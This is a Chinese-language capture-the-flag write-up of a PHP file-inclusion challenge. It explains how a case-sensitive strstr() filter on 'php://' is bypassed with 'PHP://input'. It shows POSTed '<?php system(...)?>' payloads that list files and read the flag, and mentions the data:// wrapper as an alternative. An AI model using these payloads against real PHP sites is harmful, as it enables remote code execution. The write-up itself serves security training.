Web_php_include-攻防世界

0x00 简介

记录这个题纯粹是为了记录以下有关strstr()函数的相关知识。

0x01 题目

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

其中的涉及了两个函数：strstr()函数、str_replace()函数。

strstr函数：strstr(字符串,你要搜索的内容,false)

括号里面有三个部分：

1.字符串：也就是上面的$page。例如：在url后面添加 /?page=123456，那么$page的内容就是123456。

2.你要搜索的内容：也就是题目中的php://。意思就是该函数会从$page的内容里去寻找php://，而这里是一个while语句，一旦查找到php://，那么就会执行大括号里面的语句。

例如：我的url是

http://111.198.29.45:50769/?page=php.php://input

那么传入的$page的内容就是php://input，而前面的“php.”就会被丢弃。

3.false：我这里写false的原因是该参数默认是false。也就是一般情况只需要写前两个参数即可。false代表匹配到php://之后，会输出php://和之后的内容。而如果为true，则会输出“php.”，也就是php://前面的内容。

注：strstr函数对大小写敏感，也就是会区分大小写。

str_replace函数：这个函数的作用是将匹配到的php://全部替换为空。

例如：str_replace(“1”，“2”，“123”)会输出223。因为会将全部的1替换为2。（同样区分大小写）

解法就不细说了，本意只是为了记录一下函数。

将php://改为PHP://即可，因为strstr函数对大小写敏感。

http://111.198.29.45:50769/?page=PHP://input

burp抓包，post传参：<?php system("ls");?>

就会看到3个文件，再使用<?php system("cat fl4gisisish3r3.php");?>便能拿到flag。

然后就是还可以利用data://伪协议来解题。

data://伪协议

php5.2.0起，数据流封装器开始有效，主要用于数据流的读取。如果传入的数据是PHP代码，就会执行代码

使用方法:data://text/plain;base64,xxxx(base64编码后的数据)